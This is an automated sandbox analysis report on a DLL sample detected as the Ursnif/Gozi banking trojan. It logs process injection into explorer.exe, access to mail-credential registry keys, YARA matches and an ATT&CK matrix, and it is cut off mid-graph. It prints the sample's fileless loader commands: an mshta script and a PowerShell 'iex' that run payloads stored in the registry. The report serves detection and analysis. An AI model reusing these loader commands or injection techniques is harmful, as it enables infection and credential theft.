          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\control.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5156
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3564
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep time: -9223372036854770s >= -30000s
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02773512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05415518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05404CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0540B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0540834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_054016E1 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
          Source: explorer.exe, 00000024.00000002.616609988.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000024.00000000.413817757.000000000374F000.00000004.00000001.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000024.00000000.413817757.000000000374F000.00000004.00000001.sdmpBinary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000024.00000000.411669645.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000024.00000000.430548360.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000024.00000002.622481126.00000000053D7000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000024.00000000.430548360.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0542556E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05401F12 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Changes memory attributes in foreign processes to executable or writableShow sources
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFA9B851580 protect: page execute read
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFA9B851580 protect: page execute read
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFA9B851580 protect: page execute read
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFA9B851580 protect: page execute read
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFA9B851580 protect: page execute read
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
          Compiles code for process injection (via .Net compiler)Show sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.0.cs
          Creates a thread in another existing process (thread injection)Show sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 9B851580
          Source: C:\Windows\explorer.exeThread created: unknown EIP: 9B851580
          Source: C:\Windows\explorer.exeThread created: unknown EIP: 9B851580
          Source: C:\Windows\explorer.exeThread created: unknown EIP: 9B851580
          Source: C:\Windows\explorer.exeThread created: unknown EIP: 9B851580
          Source: C:\Windows\explorer.exeThread created: unknown EIP: 9B851580
          Injects code into the Windows Explorer (explorer.exe)Show sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3472 base: EB0000 value: 00
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3472 base: 7FFA9B851580 value: EB
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3472 base: 3020000 value: 80
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3472 base: 7FFA9B851580 value: 40
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
          Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
          Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
          Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
          Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write
          Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3472
          Source: C:\Windows\explorer.exeThread register set: target process: 4016
          Source: C:\Windows\explorer.exeThread register set: target process: 4288
          Source: C:\Windows\explorer.exeThread register set: target process: 4448
          Source: C:\Windows\explorer.exeThread register set: target process: 5936
          Source: C:\Windows\explorer.exeThread register set: target process: 6488
          Source: C:\Windows\explorer.exeThread register set: target process: 2092
          Writes to foreign memory regionsShow sources
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6678212E0
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6678212E0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: EB0000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFA9B851580
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 3020000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFA9B851580
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP'
          Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
          Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
          Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000024.00000000.411588453.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0277A12A cpuid
          Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05405F90 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027712E8 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0277A12A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0277A667 GetVersionExA,wsprintfA,
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY
          Tries to steal Mail credentials (via file access)Show sources
          Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
          Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

          Remote Access Functionality:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1Windows Management Instrumentation2DLL Side-Loading1DLL Side-Loading1Obfuscated Files or Information2Credential API Hooking3System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsNative API1Valid Accounts1Valid Accounts1Software Packing2LSASS MemoryAccount Discovery1Remote Desktop ProtocolEmail Collection11Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsCommand and Scripting Interpreter12Logon Script (Windows)Access Token Manipulation1DLL Side-Loading1Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesCredential API Hooking3Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsPowerShell1Logon Script (Mac)Process Injection713Rootkit4NTDSSystem Information Discovery35Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol5SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonValid Accounts1Cached Domain CredentialsSecurity Software Discovery11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncVirtualization/Sandbox Evasion3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion3Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection713/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Regsvr321Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRundll321Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 353243 Sample: NJPcHPuRcG.dll Startdate: 15/02/2021 Architecture: WINDOWS Score: 100 61 resolver1.opendns.com 2->61 89 Found malware configuration 2->89 91 Malicious sample detected (through community Yara rule) 2->91 93 Multi AV Scanner detection for submitted file 2->93 95 8 other signatures 2->95 10 mshta.exe 2->10         started        13 loaddll32.exe 1 2->13         started        signatures3 process4 signatures5 105 Suspicious powershell command line found 10->105 15 powershell.exe 10->15         started        19 regsvr32.exe 2 13->19         started        21 cmd.exe 1 13->21         started        process6 file7 57 C:\Users\user\AppData\Local\...\yacmzdf3.0.cs, UTF-8 15->57 dropped 59 C:\Users\user\AppData\...\mu1rnx1a.cmdline, UTF-8 15->59 dropped 75 Injects code into the Windows Explorer (explorer.exe) 15->75 77 Writes to foreign memory regions 15->77 79 Modifies the context of a thread in another process (thread injection) 15->79 87 3 other signatures 15->87 23 explorer.exe 15->23 injected 27 csc.exe 15->27         started        30 csc.exe 15->30         started        32 conhost.exe 15->32         started        81 Detected Gozi e-Banking trojan 19->81 83 Writes or reads registry keys via WMI 19->83 85 Writes 